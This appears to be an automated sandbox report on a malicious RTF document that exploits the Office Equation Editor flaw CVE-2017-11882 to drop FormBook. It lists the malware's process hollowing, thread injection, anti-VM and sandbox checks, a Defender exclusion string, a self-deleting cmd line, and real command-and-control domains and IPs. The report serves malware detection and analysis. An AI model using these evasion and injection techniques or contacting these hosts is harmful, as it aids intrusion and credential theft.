            Source: 4.0.vbc.exe.1090000.0.unpack, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 4.0.vbc.exe.1090000.8.unpack, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 4.2.vbc.exe.1090000.5.unpack, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 4.0.vbc.exe.1090000.2.unpack, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 4.0.vbc.exe.1090000.6.unpack, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0041685A push C1F93286h; ret
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0041D4B5 push eax; ret
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0041D56C push eax; ret
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0041D502 push eax; ret
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0041D50B push eax; ret
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0041660F push ss; retf
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0040B75A push esp; retf
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A4DFA1 push ecx; ret
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01ECDFA1 push ecx; ret
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_000DD4B5 push eax; ret
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_000DD50B push eax; ret
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_000DD502 push eax; ret
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_000DD56C push eax; ret
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_000D660F push ss; retf
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_000CB75A push esp; retf
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_000D685A push C1F93286h; ret
            Source: initial sampleStatic PE information: section name: .text entropy: 7.77893217222
            Source: initial sampleStatic PE information: section name: .text entropy: 7.77893217222
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

            Boot Survival:

            barindex
            Drops PE files to the user root directoryShow sources
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Modifies the prolog of user mode functions (user mode inline hooks)Show sources
            Source: explorer.exeUser mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8C 0xCE 0xE5
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\raserver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Yara detected AntiVM3Show sources
            Source: Yara matchFile source: 00000003.00000002.415205594.000000000256D000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.415174262.0000000002551000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2652, type: MEMORYSTR
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: vbc.exe, 00000003.00000002.415205594.000000000256D000.00000004.00000001.sdmp, vbc.exe, 00000003.00000002.415174262.0000000002551000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
            Source: vbc.exe, 00000003.00000002.415205594.000000000256D000.00000004.00000001.sdmp, vbc.exe, 00000003.00000002.415174262.0000000002551000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
            Tries to detect virtualization through RDTSC time measurementsShow sources
            Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 00000000000C9904 second address: 00000000000C990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 00000000000C9B7E second address: 00000000000C9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1528Thread sleep time: -180000s >= -30000s
            Source: C:\Users\Public\vbc.exe TID: 2576Thread sleep time: -37574s >= -30000s
            Source: C:\Users\Public\vbc.exe TID: 2588Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\explorer.exe TID: 2080Thread sleep time: -36000s >= -30000s
            Source: C:\Windows\SysWOW64\raserver.exe TID: 2028Thread sleep time: -34000s >= -30000s
            Source: C:\Windows\SysWOW64\raserver.exeLast function: Thread delayed
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00409AB0 rdtsc
            Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformation
            Source: C:\Users\Public\vbc.exeThread delayed: delay time: 37574
            Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
            Source: vbc.exe, 00000003.00000002.415174262.0000000002551000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
            Source: explorer.exe, 00000005.00000000.456041040.0000000000255000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000005.00000000.457933367.000000000457A000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
            Source: vbc.exe, 00000003.00000002.415174262.0000000002551000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: vbc.exe, 00000003.00000002.415174262.0000000002551000.00000004.00000001.sdmpBinary or memory string: vmware
            Source: explorer.exe, 00000005.00000000.457933367.000000000457A000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
            Source: explorer.exe, 00000005.00000000.431669651.00000000044E7000.00000004.00000001.sdmpBinary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0
            Source: explorer.exe, 00000005.00000000.456077913.000000000029B000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
            Source: explorer.exe, 00000005.00000000.421288700.00000000045D6000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000005.00000000.433667543.0000000008418000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&00000000g
            Source: vbc.exe, 00000003.00000002.415174262.0000000002551000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00409AB0 rdtsc
            Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\raserver.exeProcess token adjusted: Debug
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A526F8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EB00EA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EB0080 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01ED26F8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\vbc.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\raserver.exeProcess queried: DebugPort
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0040ACF0 LdrLoadDll,
            Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\explorer.exeDomain query: www.cuteprofessionalscrubs.com
            Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
            Source: C:\Windows\explorer.exeDomain query: www.mountfrenchlodge.net
            Sample uses process hollowing techniqueShow sources
            Source: C:\Users\Public\vbc.exeSection unmapped: C:\Windows\SysWOW64\raserver.exe base address: 480000
            Maps a DLL or memory area into another processShow sources
            Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
            Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\raserver.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Windows\SysWOW64\raserver.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Injects a PE file into a foreign processesShow sources
            Source: C:\Users\Public\vbc.exeMemory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
            Queues an APC in another process (thread injection)Show sources
            Source: C:\Users\Public\vbc.exeThread APC queued: target process: C:\Windows\explorer.exe
            Modifies the context of a thread in another process (thread injection)Show sources
            Source: C:\Users\Public\vbc.exeThread register set: target process: 1764
            Source: C:\Users\Public\vbc.exeThread register set: target process: 1764
            Source: C:\Windows\SysWOW64\raserver.exeThread register set: target process: 1764
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
            Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
            Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe
            Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"
            Source: explorer.exe, 00000005.00000000.424665846.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.456041040.0000000000255000.00000004.00000020.sdmpBinary or memory string: ProgmanG
            Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformation
            Source: C:\Users\Public\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 4.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.442632634.00000000098BF000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.413230327.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.415523369.0000000003559000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.412873082.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.482437472.0000000000370000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.665645508.0000000001BC0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.434267788.00000000098BF000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.665856666.0000000001BF0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.482329327.0000000000130000.00000040.00020000.sdmp, type: MEMORY

            Remote Access Functionality:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 4.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.442632634.00000000098BF000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.413230327.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.415523369.0000000003559000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.412873082.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.482437472.0000000000370000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.665645508.0000000001BC0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.434267788.00000000098BF000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.665856666.0000000001BF0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.482329327.0000000000130000.00000040.00020000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsShared Modules1Path InterceptionProcess Injection612Rootkit1Credential API Hooking1Security Software Discovery221Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading111LSASS MemoryProcess Discovery2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer14Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion31NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol123SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection612LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsSystem Information Discovery113VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information4DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing13Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 528701 Sample: 3nkW4MtwSD Startdate: 25/11/2021 Architecture: WINDOWS Score: 100 37 www.troddu.com 2->37 39 troddu.com 2->39 53 Found malware configuration 2->53 55 Malicious sample detected (through community Yara rule) 2->55 57 Antivirus detection for dropped file 2->57 59 15 other signatures 2->59 10 EQNEDT32.EXE 12 2->10         started        15 WINWORD.EXE 291 19 2->15         started        signatures3 process4 dnsIp5 41 198.46.199.153, 49165, 80 AS-COLOCROSSINGUS United States 10->41 31 C:\Users\user\AppData\Local\...\vbc[1].exe, PE32 10->31 dropped 33 C:\Users\Public\vbc.exe, PE32 10->33 dropped 77 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->77 17 vbc.exe 10->17         started        35 ~WRF{85338F29-7DEE...4-3AA1C7FBE740}.tmp, Composite 15->35 dropped file6 signatures7 process8 signatures9 49 Tries to detect virtualization through RDTSC time measurements 17->49 51 Injects a PE file into a foreign processes 17->51 20 vbc.exe 17->20         started        process10 signatures11 61 Modifies the context of a thread in another process (thread injection) 20->61 63 Maps a DLL or memory area into another process 20->63 65 Sample uses process hollowing technique 20->65 67 Queues an APC in another process (thread injection) 20->67 23 raserver.exe 20->23         started        26 explorer.exe 20->26 injected process12 dnsIp13 69 Modifies the context of a thread in another process (thread injection) 23->69 71 Maps a DLL or memory area into another process 23->71 73 Tries to detect virtualization through RDTSC time measurements 23->73 29 cmd.exe 23->29         started        43 www.mountfrenchlodge.net 26->43 45 www.cuteprofessionalscrubs.com 26->45 47 2 other IPs or domains 26->47 75 System process connects to network (likely due to code injection or exploit) 26->75 signatures14 process15

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            3nkW4MtwSD.rtf56%VirustotalBrowse
            3nkW4MtwSD.rtf100%AviraHEUR/Rtf.Malformed

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{85338F29-7DEE-45E7-AE54-3AA1C7FBE740}.tmp100%AviraEXP/CVE-2017-11882.Gen
